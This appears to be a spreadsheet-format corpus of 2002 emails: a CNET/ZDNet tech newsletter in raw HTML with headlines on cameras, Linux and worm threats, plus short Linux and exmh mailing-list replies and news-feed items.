 Will Bush's reforms be enough to calm the Investor Class?
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 15, 2002 issue
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ba-m-45QXpKAWYXXShxhOmI_uIUEknR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;b&gt;Making sense of irrational exuberance&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 A University of Chicago economist says investors' manic behavior during stock market bubbles may not be as crazy as it seems.&lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 12, 2002
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=cf-ebM-QLw2Hw8nMhVJaylIO7r3fxeR"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href="http://clickthru.online.com/Click?q=e4-ABYFQVkWGjKCv8NI81u0PT_Qv1yR"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href="http://clickthru.online.com/Click?q=fa-FmqNQhO2iOVBUIltvDA4oSMpoLnR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/pg/021502_pointcamera.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=0f-RM2lIqjk51ezDgusUb9HGRJ1bfeR"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href="http://clickthru.online.com/Click?q=24-8DdMIcz6CpSRROVgeUef92iqrwyR" &gt;5-megapixel shoot-out&lt;/a&gt;&lt;br /&gt;
 &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=39-7QgMIjI6kpW3FhwCGLs-y39w-_lR"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href="http://clickthru.online.com/Click?q=4e-0Y95InZASFMHiaLIKlsTn8N_Jj9R" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 2. &lt;a href="http://clickthru.online.com/Click?q=63-tPKjIHWSgVXryWTg_9-hwkp_WEcR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 3. &lt;a href="http://clickthru.online.com/Click?q=79-rsQHIEBf9m2-X4UmFz_e0CvgpaFR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 4. &lt;a href="http://clickthru.online.com/Click?q=8e-Ve-cQCn7KXtcMnXPDuYWD0V_Wy4R" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 5. &lt;a href="http://clickthru.online.com/Click?q=a3-qXf6QYU1qSKHGlAfQffN5r5ls4rR" &gt;Nikon Coolpix 995&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=b8-smr2QQUw-Vm1xOHlq9S_p8qkEiiR"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src="http://news.cnet.com/i/ne/bb/2002/07/0712_casio.jpg" alt="" width="96" height="72" border="0"&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;img src="http://home.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;
                         &lt;b&gt;&lt;font size="+0"&gt;&lt;a href="http://clickthru.online.com/Click?q=cd-VHhSQzsK3TK3943FjAi_TOlRfXPR" &gt;Shoot and groove with Casio's slim camera&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 Correspondent Melissa Francis takes a look at the new Casio digital camera that's the size of a credit card and can record  and play music in the MP3 format.&lt;br&gt;
                         &lt;a href="http://clickthru.online.com/Click?q=e2-J1OpQhyzY9pCJKqENBEZdihv9KnR" &gt;&lt;img src="http://news.cnet.com/i/gl/vid-w.gif" width=24 height=18 border=0 hspace=3 align=top&gt;&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=f7-N0QnQLgzfYw3rQHlrZIGiR6ImOeR"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href="http://clickthru.online.com/Click?q=0c-_Y3DIc8H37pj0VfWDjP2qJ13b4yR" &gt;
 Merger means bigger bag of chips&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=21-UPROIjdDDu9sa_YoQqYoj1cTQ4lR" &gt;
 European PC sales take another dip&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=36-wg7-IiI4fXK8ojaMxvH3QainXQ4R" &gt;
 Rivals help improve Dell's outlook&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;E-Business&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=4c-jxi2IZpIbJTLVRPAu7hgvo2AKesR" &gt;
 Stocks mixed as techs offer some gains&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=61-x9oAIoLjvQMtiub4JYndFK-AWlFR" &gt;
 Asian travel portal takes off&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=76-vJf7InBPTW4dChi1okYP2r70U69R" &gt;
 N.Y. subpoenas PayPal over gambling&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Communications&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=8b-SBGBQY0y2o3uYJSEYIEElDh4B1rR" &gt;
 More government eyes on Qwest&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=a0-11h8QQBqNNqVOGPUByjw2PB1s7iR" &gt;
 Broadband: U.K. sees double&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=b5-50FcQ7U79NuLB_Z1PHq15ZNEEZPR" &gt;
 Ebbers said to know books cooked&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Media&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=ca-iciuQUgF71mjDXfcl8jfOfRHHUnR" &gt;
 AOL on the hunt for new CEO&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=df-1kJhQLEFh2aFERHfbQq-Kh1XhaeR" &gt;
 Asia proves sweet spot for Yahoo&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=f4-Y-XEQ0ska-WalD8uUJ5QddfWmTyR" &gt;
 DoubleClick's new focus leads to profit&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
        &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                        &lt;b&gt;Personal Technology&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=09-joDSIj88OkioYdALYSS7ZMgtY8lR" &gt;
 Apple goes overseas with retail store&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=1e-JQuLI4jWh93rRCdqEsB8LE27qd4R" &gt;
 Sony shrinks its Memory Stick&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=34-pJpSIcd8ld248Uq3_tvVyn4IcgyR" &gt;
 Chips, LCDs give clue to Philips' health&lt;/a&gt;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href="http://clickthru.online.com/Click?q=49-ZM4cIEpSm4V1KgjVX4RVXFO5JSFR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;p&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-zdnet@example.com&lt;br&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=5e-ssodzi029a9pzeiysym5X66NduNIGdRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=73-__ZeIBBtE591vi3T8UEE0WNrUZcR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=88-ec5PQQKxb5Kg4UY-rU358atSBbiR"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href="http://clickthru.online.com/Click?q=9d-kkCWQv0uetlPedRuKLvd75wKZzPR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b3-QHzxQYKTCrWM7ndAE64qDAwrPGrR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=c8-2lPnQWOzzb-A6nmMKE-nFr99H2iR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=dd-tpm0QzWdTbWO_zgGZP85eXsJh-PR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=f2-OZVTQUwWqrqAO_A0pvVdi5Z7ednR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=07-HqCzI5rqvUXOh8KiqzUbrvLkiDeR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e433&amp;ISSUE=2002-07-12" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=58-mr3xn9JfOQdh9wbj8bBi9GC-MRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "B" == Bill Humphries &lt;bill@whump.com&gt; writes:
     B&gt; Yes, but this is what normally happened:
     B&gt; Engineer: we can put ...
     B&gt; Designer: there's a ...
     B&gt; Creative Director: I want it in blue ...
 Yup, seen it happen oodles of times, only all three of those folks
 are one and the same person.  The fourth is the business manager
 who says "whatever, so long as you do it on your own time"
 -- 
 Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
  - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
   "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Product Review: Virtools Dev 2.0
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613672,159/
 Date: 2002-10-06T18:12:48+01:00
 For those new to the product, Virtools is a production environment (such as 
 Director) designed to allow the rapid creation of 3D-interactive 
 applications.The second version of Virtools clearly builds upon previous 
 releases, keeping a similar look while adding a host of new features that 
 greatly improve the final package.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] slashdot EW Dijkstra humor
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2002-08-12 at 19:56, Kenn Humborg wrote:
 &gt; Well, you should consider 'break' inside a 'select' statement
 &gt; to be part of the syntax, rather than a control flow modifier.
 Why? When it comes down to the assembly level, it gets turned
 into some kind of jump instruction. Should I pretend I don't know
 this when I'm programming?
 &gt; A _mandatory_ part of the syntax, at that.
 It's not mandatory. You can leave out the break, and the flow
 of control will continue to the next case. Which can be useful
 in certain circumstances.
 Nick
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Last-ditch talks aim to halt tide of violence engulfing West Africa
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8357895,215/
 Date: 2002-09-29T00:39:59+01:00
 *World latest:* Ivory Coast coup could involve rest of the region in a 
 bloodbath.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: curses interface to nmh
</t>
  </si>
  <si>
    <t xml:space="preserve">J C Lawrence &lt;claw@kanga.nu&gt; writes:
 &gt; Tom Reingold &lt;noglider@pobox.com&gt; wrote:
 &gt;&gt; Years ago, there was a package called mh-e which was an emacs
 &gt;&gt; interface to MH.  I don't know if it's still around or works.  But
 &gt;&gt; it's an idea.
 &gt; Its still around, its actively maintained, and its quite well evolved.
 I useta use mh-e regularly, but I never figured out whether it could
 handle exmh's multidrop mechanism, which is something I've grown to
 rely on.  Does that work in recent mh-e versions?  I'd love to use
 mh-e when reading mail remotely, if it can handle my multiple-inbox-
 folders setup...
 			regards, tom lane
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: When search results don't count (Tech Update)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</si>
  <si>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href="http://clickthru.online.com/Click?q=c1-PIljQpW7B4RlTh3wiOPYOLipujlR"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href="http://clickthru.online.com/Click?q=d6-yw2KQMPMW6kg4BsnOIRzw0LGkk4R"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18, 2002&lt;/font&gt;&lt;br&gt;&lt;/div&gt;
 &lt;!--DATE--&gt;
         &lt;img src="http://www.zdnet.com/techupdate/i/dots248.gif" width="248" height="5"&gt;&lt;br&gt;
         &lt;img src="http://www.zdnet.com/b.gif" width=1 height=5&gt;&lt;br&gt;
 &lt;!--LEDE ART--&gt;		
 &lt;table cellpadding=0 cellspacing=0 border=0 align=left&gt;
 &lt;tr valign=top&gt;&lt;td width="90"&gt;&lt;img src="http://image.com.com/techupdate/i/dfarber.jpg" width="85" height="110" border="0"&gt;&lt;/td&gt;&lt;/tr&gt;
  &lt;/table&gt;
 &lt;!--LEDE ART--&gt;
            &lt;font face="arial, helvetica" size="-1"&gt;
        &lt;b&gt;Dan Farber&lt;/b&gt;&lt;br&gt;
 &lt;font size="+1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ec-MHyXQVy13zXvhPz1kOqFb2GVaGyR" &gt;
 &lt;b&gt;Gaga for Google? When results don't count&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 When my Web search on a leading IT exec came up almost empty, what was I to think? As it turns out, the lack of Web tracks is not necessarily a sign of irrelevance.
 &lt;br&gt;
      &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;&lt;font size="-1"&gt;
 	 &lt;a href="http://clickthru.online.com/Click?q=01-9oXDI2jxOqwljPWvurMPGPxZ6RlR" &gt;
 	 &lt;b&gt;And it offers a lesson or two&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;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href="http://clickthru.online.com/Click?q=16-T_cjI4cTyIiO6WmDblRuaBDxRU4R" &gt;Unisys servers shape up for Itanium 2&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=2b-2FVYINzwpG8VIJgwzk0xBfd-8WrR" &gt;Linux to enter supercomputing top five&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=40-6Pp4Idnjk7JBmareVXCHnpqL0wRR" &gt;U.S. wants your mailman to snoop on you&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=55-TAHaIKJjcIFrkldqm86ccJ_2d2ZR" &gt;Motorola: Gloomier outlook for handsets&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6a-z_30IeW6ZS97vcbzceCGFySNP8dR" &gt;Yahoo Mail swaps out JavaScript words&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=7f-bn6KIIPiqGbaxkO9IO3JewkhBpuR" &gt;TI boosts Sun's UltraSparc chip&lt;/a&gt;&lt;br&gt;
  &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=95-XdwrQvdKmPU5trBr1yZeU_u_KnPR" &gt;PC slump drives AMD deeper into the red &lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=aa-gBteQXUQ1CWO_1iWLXZBXqONOVnR"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color="#990000"&gt;&lt;b&gt;David's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src="http://www.zdnet.com/techupdate/i/dberlind.gif" width="85" height="110" border="0"&gt;
 &lt;BR&gt;
 &lt;div align="center"&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;
 David&lt;br&gt;Berlind&lt;/font&gt;&lt;/div&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/dots75.gif" width=75 height=5&gt;
                 &lt;/td&gt;
                 &lt;td width=10&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
                 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!--STORY 1--&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Group proposes PC protection guarantees&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Several &lt;b&gt;U.S. government&lt;/b&gt; agencies have teamed with an international Internet security organization to support a set of 
 benchmarks aimed at guaranteeing a &lt;b&gt;minimum security standard&lt;/b&gt; for computers. While &lt;b&gt;Windows 2000&lt;/b&gt; workstations are 
 the first benchmark that the disparate organizations have agreed upon, others to  follow include &lt;b&gt;Cisco IOS&lt;/b&gt; for 
 routers, Solaris, Linux and HP-UX. Reaching agreement on these benchmarks will not be a walk in the park.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=bf-JtRfQ8ZQwRkpabR5w8PF_jEuwteR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d4-E0SqQ0EHeejcKVM_4Mc3148lk6yR" &gt;
 &lt;b&gt;Microsoft squashes Windows 2000 bugs&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 2--&gt;
  &lt;table cellpadding="0" cellspacing="0" border="0" width="85" align="right"&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
   &lt;img src="http://techupdate.zdnet.com/techupdate/i/071702_ballmer_quote.gif" width="220" height="150" border="0" align="right"&gt;
 &lt;/td&gt;
                 &lt;td width=5&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=5  height=1&gt;&lt;/td&gt;
                 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;font size="+1"&gt;&lt;b&gt;As the rhetoric turns&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Last year, &lt;b&gt;Steve Ballmer&lt;/b&gt; called the GPL on which Linux is based a "&lt;b&gt;cancer&lt;/b&gt;." This year, &lt;b&gt;Linux is a "unique 
 competititor&lt;/b&gt;." The emergence of Linux as a serious competitor to Windows has forced Microsoft to change the way it 
 approaches customers, Microsoft's CEO acknowledged at this week's Fusion 2002. Microsoft traditionally has played its &lt;b&gt;"low price, high volume"&lt;/b&gt; game against IBM, Oracle and others. Now it must figure out how to beat Linux, which has an even lower cost -- free.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=e9-gdzpQxVIg9GzLLMTRnU3P83P5XlR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
   &lt;!-- STORY 3 --&gt;
 &lt;font size="+1"&gt;
   &lt;b&gt;Wi-Fi can wait&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 The next iteration of Wi-Fi (aka &lt;b&gt;802.11a&lt;/b&gt;) may be getting a lot of interest, but rolling it out now, says &lt;b&gt;Gartner&lt;/b&gt;, would be jumping 
 the gun. The anointed successor to the &lt;b&gt;802.11b&lt;/b&gt; modulation scheme provides up to five times the throughput over its predecessor. When will it be ready for prime time?
 &lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=fe-xkIgQwgsVMu5BZxeE4rbg6amtI4R" &gt;
 &lt;b&gt;Find out why you should wait&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=13-NxSZI3XPQSrqAZWssDLfzpHOCerR" &gt;
 &lt;b&gt;'Rainbow' coalition to spread wireless&lt;/b&gt;&lt;/a&gt;
 &lt;P&gt;
 &lt;!-- STORY 4 --&gt;
 &lt;font size="+1"&gt;&lt;b&gt;More large-scale worm attacks? Brace yourself&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 It's been a year since the &lt;b&gt;Code Red&lt;/b&gt; worm wreaked havoc on the Net. What's changed? Internet worms have become &lt;b&gt;much 
 more robust&lt;/b&gt; since Code Red. And that doesn't bode well, since antivirus software hasn't kept up with all the changes. So 
 far in 2002, we've been lucky. &lt;b&gt;Robert Vamosi&lt;/b&gt; tells you how to prepare for future threats.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=28-A2wXIRdag3AZ_ZZEL2t1VlTK8yiR" &gt;
 &lt;b&gt;Here's what he recommends&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 5--&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Macworld hears roar of Jaguar&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 At this week's Macworld, Apple CEO &lt;b&gt;Steve Jobs&lt;/b&gt; heralded the early arrival (August 24) of &lt;b&gt;Mac OS X version 10.2&lt;/b&gt; 
 (code-named Jaguar), which features improved search features plus &lt;b&gt;QuickTime 6&lt;/b&gt; with support for MPEG-4. Also: An iPod 
 for Windows, a 17-inch flat-panel iMac, new charges for iTools Web services and a leg-up for Mac Office.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=3e-F51nIizcfoXtxOD_7DQESNPe-i4R" &gt;
 &lt;b&gt;Read the full report&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=53-n86dINniBiOzcAyjHpx8lOheMncR" &gt;
 &lt;b&gt;What David Coursey wants from Macworld&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 6--&gt;
 &lt;!--&lt;table cellpadding="0" cellspacing="0" border="0" width="85" align="right"&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
   &lt;img src="http://techupdate.zdnet.com/techupdate/i/071602winbook.jpg" width="220" height="207" border="0" align="right"&gt;
 &lt;/td&gt;
                 &lt;td width=5&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=5  height=1&gt;&lt;/td&gt;
                 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Fact and fiction in the Web services debate&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Iona Technologies CEO &lt;b&gt;Barry Morris&lt;/b&gt; says the battle between .Net and Java isn't important. Web services' future is held 
 hostage by an unresolved debate over &lt;b&gt;industry standards&lt;/b&gt;.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=68-iM8qIsPWu8ZhI-1ywvjsK-FdLPRR" &gt;
 &lt;b&gt;Read the full review&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;--&gt;
 &lt;!-- Write to me --&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;Write me at &lt;a href="mailto:david.berlind@cnet.com"&gt;&lt;b&gt;david.berlind@cnet.com&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;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href="http://clickthru.online.com/Click?q=7d-FFEqIDLWMEOON54Uywq2NRJSBTZR"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href="http://clickthru.online.com/Click?q=92-ubRVQTzF9II1HwEzeFOPq1FsnynR" &gt;"Embedded XP isn't the remedy."&lt;/a&gt;&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;/font&gt;  &lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
 --&gt;
 &lt;!--end quote block--&gt;
         &lt;!-- review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href="http://clickthru.online.com/Click?q=a7-fR_2Q8BskDUCvADLF5vLk7KCgFeR" &gt;
 &lt;b&gt;Fact and fiction in the Web services debate&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Iona Technologies CEO &lt;b&gt;Barry Morris&lt;/b&gt; says the battle between .Net and Java isn't important. Web services' future is held 
 hostage by an unresolved debate over &lt;b&gt;industry standards&lt;/b&gt;.
  &lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
         &lt;!-- feature --&gt;
 &lt;font face="verdana, geneva" color="#666666" size="-2"&gt;&lt;b&gt;DOWNLOADS&lt;/b&gt;&lt;/font&gt;&lt;sub&gt;&amp;nbsp;&lt;/sub&gt;&lt;br&gt;
 &lt;table width="100%" cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;
 &lt;td width="20"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="20" height="1"&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;font size="+0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=bd-c0nUQ7pV9mjCJM5pAEVgnfqGsJPR" &gt;
 &lt;b&gt;Gather Net information&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Conduct Ping, Traceroute, Finger, and Whois queries, as well as gather extensive IP information with this handy kit of 
 &lt;b&gt;network tools&lt;/b&gt;.
